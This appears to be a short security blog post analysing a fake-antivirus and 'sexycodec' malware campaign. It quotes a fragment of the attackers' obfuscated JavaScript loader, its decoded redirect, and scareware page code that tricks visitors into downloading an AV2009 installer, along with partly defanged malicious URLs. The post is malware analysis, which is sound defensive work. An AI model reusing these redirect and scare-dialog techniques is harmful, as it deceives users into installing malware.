Skip navigation.
Home

ZLOB sexy codec & Co

|

i think you know, sexycodec and fake AVs were propagated using e.g.
blog spamming
search engines
fake pronsites
hacked bbs and blogs

if case 'hacked', they use obfuscated javascript to do a 'document.write'.
both, sexycodec and fakeAV, are using the same "obfuscating engine".
play with their parameters and you are able to generate your "malware threat of the day"
by using their own cgi script.

sample:
hxyp://lineacount.info/cgi-bin/search?id=802
will send something like this:

function a(JR,O){if(!O){O='EZVq#t&d$k@grNiSHTa_ve.Gp0xM1n-3`{/|h[+JFBmzD%RWQl16,(h&65280)>>8,h&255);}eval(Gg);}a('0&]|n.L[MJHRnokBn&vFk*l*p

decoded:

document.write(' document.location="http://blazervips.com/soft.php?aid=013601&d=3&product=XPA" ');

this site will redirect you to:

http://antivirus2009-scanner.com/2009/1/freescan.php?aid=77013601

code snippet:





showwindow('x:'+window.screen.width/2+'; y:'+(window.screen.height/2-30), 'w:1; h:1'); 

is_XP_SP2     = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
  is_IE=false;
  if (navigator.appName.toLowerCase()=='microsoft internet explorer'){
    if (navigator.userAgent.toLowerCase().indexOf('opera')




at this time we got '&dlth'
the new request is:
/_download.php?aid=77013601&dlth
taken from:



	var rrc = 0;
function onloadExecutable()
{
	dat=new Date(1214833699);
	var dlth=dat.getHours()-dat.getUTCHours();
	rrc = 1;
	location.href="/_download.php?aid=77013601&dlth="+dlth;
};
function hideActiveXDialog()
{
	if(confirm('Dont close this window if you want your PC to be clean.'))
	{
		onloadExecutable();
	}
	else
	{
		if(state.toString() == 'STOPSCAN')
		{
			state.set('BEGINSCAN');
		};
	}
};

function hideWarnDialog()
{
	if(confirm('Dont close this window if your want you PC to be clean.'))	{
		onloadExecutable();
	}
	else	{
		alert_and_dl();
	};
};

again we were redirected:
hZZp://antivirus2009-scanner.com/2009/download/trial/AV2009Install_77013601.exe
hurray ! we now can have trial version of AV2009!

stay informed about their newest campaigns by using their own engines.
funny isn't it?

greets,
kat

sry, i'm still fighting with

sry, i'm still fighting with oc's blog formatting shit
and still havn't solved

"Vernichte ihn! Er ist nur ein USER!" (MCP)